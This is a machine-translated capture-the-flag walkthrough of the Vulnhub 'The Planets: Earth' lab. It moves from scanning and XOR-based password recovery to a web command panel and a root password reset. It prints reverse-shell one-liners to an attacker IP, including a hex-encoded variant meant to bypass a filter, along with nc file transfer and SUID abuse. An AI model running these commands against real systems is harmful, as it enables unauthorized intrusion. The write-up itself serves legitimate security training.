Vulnhub range the planes:earth

THE PLANETS:EARTH

Get ready

attack ： kali

Drone aircraft : THE PLANETS:EARTH NAT 192.168.91.0 Network segment

Download link

[https://www.vulnhub.com/entry/the-planets-earth,755/]

Information collection and utilization

The host found

https://github.com/czheisenberg/MyCode/blob/master/Scan/scapy/ping.py

Use... As shown in the figure python Script scanning except IP Address .

Port scanning

nmap -O -sV -p- -A 192.168.91.171 -oN earth_namp.txt

As shown in the figure, it is open Three ports , 22,80,443, And 80 and 443 All are python3.9 constitute

HTTP and HTTPS

http://192.168.91.171/

https://192.168.91.171/

As shown in the figure , Open directly as Bad Request(400), Now pay attention to namp Scan results :

You can see two DNS Record , Therefore, it needs to be modified manually /etc/hosts Information .

windows: C:\Windows\System32\dirvers\etc\hosts

Linux: /etc/hosts

ipconfig /flushdns

Refresh DNS cache

At this point, you can access the page normally
https://earth.local/

37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40

3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

https://terratest.earth.local/

Directory scanning

python3 dirsearch.py -u https://earth.local/

python3 dirsearch.py -u https://terratest.earth.local/

Visit one by one
https://earth.local/admin/login


This plug-in can be seen as Django

Guess if it's turned on DEBUG Pattern , Input at will url Show Not Found It proves that it is closed DEBUG Pattern .

https://terratest.earth.local/robots.txt

Is there any Django,robots Agreement * Unknown , I can't visit , the last one testingnotes.* Guess the suffix is txt There are the following contents

https://terratest.earth.local/testingnotes.txt

 Precautions for testing secure messaging system ：

\* Use XOR Encryption as an algorithm , Should be and RSA It is as safe as that used in .

\* The earth has confirmed that they have received the message we sent .

\*testdata.txt Used to test encryption .

**\*terra User name used as the administrator portal .**

** To do list ：**

**\* How can we safely send our monthly keys to the earth ？ Or should we change our keys every week ？**

**\* Different key lengths need to be tested to prevent violence . How long should the key be kept ？**

**\* The messaging interface and the management panel interface need to be improved , This is very basic at present .

https://terratest.earth.local/testdata.txt

 Based on radiometric dating estimates and other evidence , The earth was formed in 45 Hundred years ago . At the beginning of the earth's history 10 In 100 million years , Life appears in the ocean , And began to affect the earth's atmosphere and surface , Leading to the spread of anaerobic and later aerobic organisms . Some geological evidence shows that , Life may have predated 41 It's been around for hundreds of millions of years .

From the above, we can know the following information :

1. terra  Is the administrator user name 
2.  Use  XOR （ Exclusive or ） operation 
3.  You need to put the    Previous Messages  And  testdata.txt  do   Exclusive or operation , To decrypt .
4.  do CTF Title  

decode

import binascii
c = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

m = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

m = binascii.b2a\_hex(m.encode("utf-8"))

result = hex(int(c,16) ^ int(m,16))

print(result)

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

On-line 16 Base to character
https://www.sojson.com/hexadecimal.html

Get the results ：

earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

It is found that all is repetition : earthclimatechangebad4humans

So I got the account number and password :

land

terra:earthclimatechangebad4humans

As shown in the figure, the login is successful , Come to a command execution interface

Input id;ls so , by apache user , It also shows Contents under the root directory , according to vulnhub Description of : There are two flags on the box: a user and root flag which include an md5 hash.

flag 1

There are two flag, Namely user Next and root Next

Input find / -name “*flag*” We found it flag be located /var/earth_web/user_flag.txt

As shown in the figure, I got the first one flag, According to the description, the second flag be located root Under the table of contents , So we have to get it by raising the right root Permission to view .

getshell

bash -i >& /dev/tcp/172.31.160.47/4444 0>&1

As shown in the figure ： Remote connection prohibited .

After reading the article of the boss, it is said that IP Address Hexadecimal conversion , Why exactly , I don't know , Copy it ！ Remember this technique .

bash -i >& /dev/tcp/0xac.0x1f.0xa0.0x2f/4444 0>&1

good , Got it shell, Next, I propose the right , First, collect information
cat /etc/passwd

As shown in the figure, only two users have /bin/bash : root, earth

uname -a

useless

Try

SUID Raise the right

find / -perm -u=s -type f 2>/dev/null

As shown in the figure, according to the returned result ,/usr/bin/reset_root It is highly possible to get root jurisdiction .

Direct operation

Check for reset triggers

Reset failed , All triggers do not exist

It is as expected , Failure .

It is impossible to debug on the target plane , You can download this command to kali In the debugging , Downloads can take advantage of nc Transfer files .

First in kali/ The receiver starts :

nc -l 5555 > reset_root

Then on the target plane / The sender start-up
nc 172.31.160.47 5555 < /usr/bin/reset_root

Can see instant completion .

You will now reset_root Download it , It's ready to debug , Here is a new command to learn : strace

Without this command , Just install it once .

Before use, you need to reset_root Grant Execution Authority
chmod +x reset_root

strace ./reset_root

From the returned results, we can see that Yes Three No such file or directory

access("/dev/shm/kHgTFI5G", F\_OK)       = -1 ENOENT (No such file or directory)

access("/dev/shm/Zw7bV9U5", F\_OK)       = -1 ENOENT (No such file or directory)

access("/tmp/kcM0Wewe", F\_OK)           = -1 ENOENT (No such file or directory)

Maybe the three files are not available on the target plane , Thus, the operation fails , Let's create these three files on the target plane , What is in the file ？ No one knows if there is any content . To look at first Whether the target aircraft has these three documents , If not, create and run .

As shown in the figure, there is really no ,strace The command is awesome .

establish , And then run

From the returned results, we can see that : resetting root password to : Earth, take root The user's password is changed to Earth.

Switch root

As shown in the figure, it is now root.

flag 2

summary ：

1. The difficulty lies in password cracking , According to the plaintext and ciphertext, and then XOR operation to get the password .
2. Newly learned nc Can be used to transfer files .
3. Newly learned strace command , Very powerful .
4. bash -i >& /dev/tcp/0xac.0x1f.0xa0.0x2f/4444 0>&1 Can be ip Address conversion to hexadecimal , Learned .